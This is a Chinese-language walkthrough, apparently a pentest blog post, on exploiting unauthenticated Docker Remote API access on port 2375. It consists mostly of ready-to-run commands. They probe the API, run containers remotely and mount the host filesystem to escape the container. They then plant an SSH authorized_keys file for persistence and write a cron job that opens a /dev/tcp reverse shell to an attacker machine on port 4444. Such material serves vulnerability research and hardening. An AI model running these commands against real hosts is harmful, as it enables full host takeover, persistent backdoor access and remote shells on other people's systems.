Docker Swarm是Docker的集群管理工具,它将Docker主机池转变为单个虚拟Docker主机,能够方便的进行docker集群的管理和扩展。Docker Swarm使用标准的Docker API通过2375端口来管理每个Docker节点,Docker API是一个取代远程命令行界面(RCLI)的REST API。当Docker节点的2375端口直接暴露并未做权限检查时,存在未授权访问漏洞,攻击者可以利用Docker API执行任何操作,包括执行Docker命令,创建、删除Docker以及获得宿主机权限等。
漏洞复现
访问目标的2375端口如下接口,若有信息,则存在Docker API未授权访问
http://x.x.x.x:2375/version
http://x.x.x.x:2375/images
http://x.x.x.x:2375/info
docker命令远程管理
可以使用docker命令本地远程管理docker,命令和在docker服务器管理一样。以下只列出部分命令。
docker -H tcp://10.211.55.18:2375 images -a
docker -H tcp://10.211.55.18:2375 ps
docker -H tcp://10.211.55.18:2375 exec -it e7d97caf249d /bin/bash
获取宿主机权限
但是以上方式都只是控制docker中的容器,我们如何控制docker的宿主机呢?
我们可以执行如下命令启动一个未开启的容器,然后将宿主机的磁盘挂载到容器中。
docker -H tcp://10.211.55.18:2375 run -it -v /:/opt b76f96a98a27 /bin/bash
如图可以看到已经可以管理宿主机的文件系统了。
chroot
使用chroot命令切换到挂载的目录,在使用 chroot 之后,系统的目录结构将以指定的位置作为/位置。在经过 chroot 命令之后,系统读取到的目录和文件将不在是旧系统根下的而是新根下(即被指定的新的位置)的目录结构和文件。
chroot /opt bash#然后就可以执行如下一些命令,但是查看的ip和反弹shell等一些命令,还是容器内的historycat /etc/passwd
写入SSH公钥
执行如下命令将本地的authorized_keys文件上传到/opt/root/.ssh下。
docker -H tcp://10.211.55.18:2375 cp /Users/xie/Desktop/authorized_keys 4dcf21117fb2:/opt/root/.ssh
可以看到公钥文件已经写入。但是通过这种方式上传的authorized_keys文件权限不对可以看到其属主和属组不对。
这时可以执行如下命令修改authorized_keys文件的属主和属组为root,即可正常ssh免密登录。
chown root.root authorized_keys
或者可以直接通过echo命令写入公钥文件,这样就不会有权限问题。
计划任务反弹shell
如果目标宿主机的22端口没开的话,还可以通过定时任务来反弹shell到内网的机器。
执行如下命令,将反弹shell的命令写入/var/spool/cron/root文件中。
#切换到挂载的目录
cd /opt/var/spool/cron
#写入反弹shell的命令
echo "*/1 * * * * /bin/bash -i>&/dev/tcp/10.211.55.2/4444 0>&1" > root
然后就可以收到shell了。